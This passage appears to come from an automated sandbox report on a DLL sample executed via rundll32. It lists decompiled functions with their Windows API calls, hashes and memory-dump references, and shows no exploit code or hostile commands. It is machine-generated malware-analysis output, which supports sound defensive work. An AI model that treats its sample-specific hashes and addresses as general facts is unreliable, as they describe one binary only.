                                                                                                                                  • String ID: MS Shell Dlg
                                                                                                                                  • API String ID: 1736106359-76309092
                                                                                                                                  • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                  • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                                  • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                  • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                                  • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                                  • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                  • String ID: System
                                                                                                                                  • API String ID: 46613423-3470857405
                                                                                                                                  • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                  • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                                  • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                  • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                                  • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                  • _memset.LIBCMT ref: 10020AE2
                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1891723912-0
                                                                                                                                  • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                  • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                                  • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                  • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                                    • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                                    • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                                  • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                                  • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                                  • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                                  • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                                  • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 317715441-0
                                                                                                                                  • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                  • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                                  • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                  • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                                  • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                                    • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                                    • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                                    • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 168474834-0
                                                                                                                                  • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                  • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                                  • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                  • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                                  • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1151147025-0
                                                                                                                                  • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                  • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                                  • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                  • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                                  • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                                    • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                  • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                                  • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2841959276-0
                                                                                                                                  • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                  • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                                  • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                  • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                                  • _memset.LIBCMT ref: 10029DA5
                                                                                                                                    • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                                    • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                    • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                    • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2905758408-0
                                                                                                                                  • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                  • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                                  • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                  • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3574576181-0
                                                                                                                                  • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                  • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                                  • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                  • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                  • String ID: Software\
                                                                                                                                  • API String ID: 3878845136-964853688
                                                                                                                                  • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                  • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                                  • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                  • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(?), ref: 1001AC38
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                                  • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                                  • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                                  • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                                  • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                                    • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2853195852-0
                                                                                                                                  • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                  • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                                  • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                  • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3219385341-0
                                                                                                                                  • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                  • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                                  • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                  • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                                  • GetParent.USER32(?), ref: 1002A22C
                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                                  • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
